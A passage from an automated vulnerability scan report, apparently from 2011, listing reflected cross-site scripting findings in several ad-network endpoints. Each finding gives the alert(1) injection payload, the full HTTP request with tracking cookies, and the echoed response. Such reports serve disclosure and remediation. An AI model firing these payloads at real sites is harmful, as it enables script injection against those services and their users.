Set-Cookie: anj=Kfw))BAdco)Wh]f7y?S'<HuAT(p@Qw9/AE-(4U+vPzGLjvFYk+nwysnbZ%yhp+G^!>mHJ/[Qn^SOF-W3Xf4z<*dQUsD:-u*1$#oEh8TFFha?sqBS/]6^U*/DbYg]Mqr2:Vrct.WtC2KToR@.$C)m(E`TsR*PohR2#_*h3662#-/tB6eZAKR#N:HS+e/G^B=:]G41iy*]23/(BwUCth]o51ZN_d27HnxGMo'uGGi(0X6$G(F[[<8?bE841yayI#UtGV.cq'ri('l!6LQJWN9l2cQoV*iH]11`lAb^b)0'xX=oN/+4vHi'1gSOc<9S4EE#@*(d7)k=U8C:JN%F-F4S3G$R:hjq><pByr`w=(:CAj+.g-MCVWn_u4R:k)M3w5#XRmD0G`[FsG_#6$(1LQv'bPN@3tQ##@s758hws:.[A7a/=+]WZ_fuE/MN<Btb/ToI#4D^oB.M7l2j2mjE_@Bzt<s``c/L5dxwk2KDKIFkz]gq-b4i]Sr8x.$v]gGt`l9(lXF6KaOm][.o$F:sQaS<6[()-<5$NWVFtbjNC!m2d_!77Iw`jK:R1Y%$$(MKIm5.<][BBy!>2Q!7Lhus`)aMi%9I7E.:UZOfpwq^nA-UOE0NIUorSW3hNy; path=/; expires=Sun, 07-Aug-2011 14:01:02 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 14:01:02 GMT
Content-Length: 1468

document.write('<a href="http://ib.adnxs.com/click/DPqCvqAv-D_NzMzMzMz0PwAAAMDMzPw_-VPjpZvE-D_NzMzMzMz8P33ocmbms6M7SsYda6b2ziVw88dNAAAAAHVBBgBUAwAAZAEAAAIAAABT_gQADcAAAAEAAABVU0QAVVNEACwB-gC5H9kEPw8BAgUCAAQAAAAASS3fXgAAAAA./cnd=!QxexlQjm7wIQ0_wTGAAgjYADKNkJMQAAAMDMzPw_QhMIABAAGAAgASj-__________8BSABQAFi5P2AAaOQCaedca'-alert(1)-'239f7d9d658/referrer=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages/clickenc=http%3A%2F%2Fwww.1800flowers.com%2Frefer.do%3Fr%3
...[SNIP]...
3.55. http://ib.adnxs.com/ab [custom_macro parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the custom_macro request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 676e8'%3balert(1)//ac3354cabe was submitted in the custom_macro parameter. This input was echoed as 676e8';alert(1)//ac3354cabe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=zszMzMzM_D_5U-Olm8T4PwAAAMDMzPw_-VPjpZvE-D_NzMzMzMz8P33ocmbms6M7SsYda6b2ziVw88dNAAAAAHVBBgBUAwAAZAEAAAIAAABT_gQADcAAAAEAAABVU0QAVVNEACwB-gC5H9kEPw8BAgUCAAQAAAAAcC4a9AAAAAA.&tt_code=4455744&udj=uf%28%27a%27%2C+10005%2C+1304949637%29%3Buf%28%27c%27%2C+47078%2C+1304949637%29%3Buf%28%27r%27%2C+327251%2C+1304949637%29%3Bppv%289163%2C+%274297476271584241789%27%2C+1304949637%2C+1305122437%2C+47078%2C+49165%29%3B&cnd=!QxexlQjm7wIQ0_wTGAAgjYADKNkJMQAAAMDMzPw_QhMIABAAGAAgASj-__________8BSABQAFi5P2AAaOQC&referrer=http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5EH26G%5ECP_ID%5E47078%5ESEG_CODES%5EH26G-8676e8'%3balert(1)//ac3354cabe&pp=1.30 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:01:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:13 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vt>vMr8g<B)#kQD2BQ%KJQUPq'0FP0G>i/e:Qc*>v.pXxAzo0EmQU<wKU!?-n$)FuX+9::dG9$]P=bB9=KQ3VDqSp>]+c$9xZgM0:#`mv`egs9[Zs#Tm8tKRN[(IqkzJsrKg#Il/>mh'Aw`7Y7j?03ZmAl8.J)NHKIE>]===+mPT2IDg(oYoU6mwDQJZ>k/JXf11=8a*m0NKBz>LI_kuKVy<>xeO1cNsy?[h0iVz>1Z!:K2zPM$>)62*@?wi/i1l9)s2T=Z0:MIlHiRYm!jT:CV2hPWmTjX6I]dq<@$i?62FM[?>NEQqOTgzZhjQh7B^M/'0yu[>bUhl/X=[w[*`ootb('G4k=aZ5wnPmF5t7HIvrz7#I3C<^2/j3wcQ5Q[TxNH:3lOzx^F^4X^U(#mPpW[w(HpOWk.Mg87T3<t+<g[>jaB4phea329Q9Q:oIk.ah$W8jmjmq[u[Rq45%Z+Tw-X%07JfHyq[eTsKZC6Zp%L2Mq5VPFc])io#nF$(8yxjqkwSzMH1/Y0=>7(.3eEJP$k64/Cq'*33Bi3ib:R)BiMQhKJQB.VpW`%@X>AZWwAWvE)DqcSYa`.:C_o)CPSUzd3zH72eX(`=wzAW4hEdk*; path=/; expires=Sun, 07-Aug-2011 14:01:13 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 14:01:13 GMT
Content-Length: 1518

document.write('<a href="http://ib.adnxs.com/click/DPqCvqAv-D_NzMzMzMz0PwAAAMDMzPw_-VPjpZvE-D_NzMzMzMz8P33ocmbms6M7SsYda6b2ziVw88dNAAAAAHVBBgBUAwAAZAEAAAIAAABT_gQADcAAAAEAAABVU0QAVVNEACwB-gC5H9kEPw8BA
...[SNIP]...
<img src="http://xcdn.xgraph.net/17572/ae/xg.gif?type=ae&ais=ApN&pid=17572&cid=H26G&n_cid=47078&crid=300x250_8F_Interim_finalgif&n_crid=327251&mpm=CPM&n_g=u&n_a=0&aids=H26G-8676e8';alert(1)//ac3354cabe&n_price=1.511628&n_bust=1304949616&n=http%3A%2F%2Fdata.cmcore.com%2Fimp%3Ftid%3D17%26ci%3D90074784%26vn1%3D4.1.1%26vn2%3De4.0%26ec%3DUTF-8%26cm_mmc%3DIM_Display-_-x-_-x15off-_-postvday%26cm_mmca1%3D30
...[SNIP]...
3.56. http://ib.adnxs.com/ptj [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f10ad'%3balert(1)//60a1fb087ec was submitted in the redir parameter. This input was echoed as f10ad';alert(1)//60a1fb087ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.tribune&size=300x600&imp_id=cm-87971011_1304949578,11f8f328940989e&referrer=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.tribune%2Fuscell_ldev_300x600_05311%3Bnet%3Dcm%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.{PRICEBUCKET}-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Btgt%3Dbrand%3Bcmw%3Dowl%3Bsz%3D300x600%3Bnet%3Dcm%3Bord1%3D680525%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3Bord%3D5044004%3Ff10ad'%3balert(1)//60a1fb087ec HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#-r-98m2jrr-%SN'CJQE2F!)VKr0:$5r$<o/e@)WesS%k+n*I('YxYT*<N@6F+c(io$N-%L1@9'b[5(:jB-9V[OUYy9.R5e[ytcpQ`bMH@TW6X$3_sCR$6Xedk-G'TDF.mC`)B_N$6LQR^Q1gg.MkA)P$tfA)DWsB'hbJ<Zo?BY+A8^^2)oHZ5mIqhtj<v4iwpkyYITX547eLID>>z*PI7v'je[t@sbTLvZL[5/^@u)U'+YE]A*I/WjMFL7TH)6(3+$CLIE.`Q02p!/Bh8LJdJMOI#teJcaJ2gAxMkoDkRfC>:upDX3r@Xk!*_O@<)?o7FEG#?s@>3rsZ:NP+SZwInEb8?uR<<.1bW>zC'DHc(RjR_5cV/>hV4<.Ep_Brg%LYIKnl%jfU4H4E7-mJZW+LULZ/rSrz3JC#MNpp09cPRI)3/W$VKQg4AB[7:`laDI'0.])0*DP]MTFF+TEc'nRbjb[T9R5j$WfUnk:l:dTEaTSKXEV/XvsO=)MPZ#H-A8'm1SbZ-hlwo/uIEE1WKi>%cMg!FYc3gk*_!.KhjIbfv>n6icJz]`pNnloA:BN7K@E`FgYF*-qn0v`vWZ1n

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-YMBEAoYASABKAEw7eaf7gQQ7eaf7gQYAA..; path=/; expires=Sun, 07-Aug-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb133666=5_[r^202nWv$PLv0nf8M[Ys2+?enc=rkfhehSu4z-DwMqhRbbhPwAAAAAAAPA_g8DKoUW24T-uR-F6FK7jPzb1FLF9zeROSsYda6b2ziVt88dNAAAAALY-AwA3AQAAGgEAAAIAAACrJgQAkWAAAAEAAABVU0QAVVNEACwBWAKqAQAA3wsBAgUCAAUAAAAARyUkjgAAAAA.&tt_code=cm.tribune&udj=uf%28%27a%27%2C+2248%2C+1304949613%29%3Buf%28%27c%27%2C+61473%2C+1304949613%29%3Buf%28%27r%27%2C+272043%2C+1304949613%29%3Bppv%287166%2C+%275684894569373955382%27%2C+1304949613%2C+1336485613%2C+61473%2C+24721%29%3B&cnd=!AxYOawih4AMQq80QGAAgkcEBKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; path=/; expires=Tue, 10-May-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ%E]*wn6#L)u[7Pl_F#:3V_M'dWhq<A4H9QLwh!0(2d(:ZyP'RCvb./f.(AQEh7GXym(].`Qj0%7`fZ:(E9V)IjhpWXS^efpCN#M1:-ppF^x.X)sgXP^jl:%[)rcMuH4Nf@kf+1^R-)S>XM5XPrPErAzb4-^a4y@Jx`bv:za2Z1YQHReEE7N'0=1'b#WYayc'16yUR#PmqgRNSeu>Hnq$4n5N(wZhI:G3G^w>>s-.6hU<:[/xh9)p3_0)uj3eO+Cv-/*(0$W`5v[FaE-1r0pCXmB`tyV$2!luhmrx>S#*].(5s.Z!F=sL>?ZMLXXKeCE$`f%U#<.Vr(2YPMbq8r*Oyu2`zKCrSA0w6kFos`u*A@=8(6<k:P1rsXF`Rd0.w(7ba)>_Mpgwbe*2/`rux6!0iVYbij2Z6nZ-c?cOa#n^<Ga:jYoKIKQ0t(nw9!0a(!oOgpu*?'%%gRXF)1hx-CUx5u`W-8Ct+Qm60WPMsHmUS/>#4OdTJx+KCMm*E:=KUCI8M4DN=ZhjFId#K??]aY=yV(aaiJ*!T(Cj/Rd*6LcB16Pp'4k9L2b0d1v*[w(H]u'0ytiMqP2wZM+I$`:y#ChV=lN%9$vaKzY3; path=/; expires=Sun, 07-Aug-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 14:00:13 GMT
Content-Length: 650

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.tribune/uscell_ldev_300x600_05311;net=cm;u=,cm-87971011_1304949578,11f8f328940989e,ent,ax.40-cm.ent_l-cm.music_h-
...[SNIP]...
;sz=300x600;net=cm;ord1=680525;contx=ent;an=40;dc=w;btg=cm.ent_l;btg=cm.music_h;btg=ti.aal;btg=bz.25;btg=dx.16;btg=dx.23;btg=dx.17;btg=rt.truecredit2;btg=qc.ae;btg=qc.ac;btg=idgt.careers_l;ord=5044004?f10ad';alert(1)//60a1fb087ec">
...[SNIP]...
3.57. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c772f"-alert(1)-"078d1e6149 was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=59535&type=widesky&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26633-9.3200914.3219971?url=c772f"-alert(1)-"078d1e6149 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; uid=1_1304903354_1303179323923:6792170478871670; kwd=1_1304903354_12936:208292_11317:1160086_11717:1160086_11718:1160086_11719:1160086; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; cre=1_1304903354_29802:59536:1:542383_29805:59534:1:543044; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; scg=1_1304903354; ppd=1_1304903354; afl=1_1304903354

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:48 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1304949708_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:48 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:01:48 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 325

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=59535&type=widesky&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26633-9.3200914.3219971?url=c772f"-alert(1)-"078d1e6149' width='160' height='600' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...
3.58. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0ea5"-alert(1)-"d84ddfca88c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=59535&type=widesky&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26633-9.3200914.3219971?url=&c0ea5"-alert(1)-"d84ddfca88c=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; uid=1_1304903354_1303179323923:6792170478871670; kwd=1_1304903354_12936:208292_11317:1160086_11717:1160086_11718:1160086_11719:1160086; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; cre=1_1304903354_29802:59536:1:542383_29805:59534:1:543044; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; scg=1_1304903354; ppd=1_1304903354; afl=1_1304903354

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:02:25 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1304949745_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:02:25 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:02:25 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 329

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=59535&type=widesky&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26633-9.3200914.3219971?url=&c0ea5"-alert(1)-"d84ddfca88c=1' width='160' height='600' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...
3.59. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 346f9"-alert(1)-"99b469e8563 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=59535&type=widesky346f9"-alert(1)-"99b469e8563&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26633-9.3200914.3219971?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; uid=1_1304903354_1303179323923:6792170478871670; kwd=1_1304903354_12936:208292_11317:1160086_11717:1160086_11718:1160086_11719:1160086; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; cre=1_1304903354_29802:59536:1:542383_29805:59534:1:543044; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; scg=1_1304903354; ppd=1_1304903354; afl=1_1304903354

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:43 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1304949703_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:43 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:01:43 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 326

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=59535&type=widesky346f9"-alert(1)-"99b469e8563&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26633-9.3200914.3219971?url=' width='160' height='600' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...
3.60. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 4fec0<script>alert(1)</script>53371e24c20 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=B087254fec0<script>alert(1)</script>53371e24c20 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2J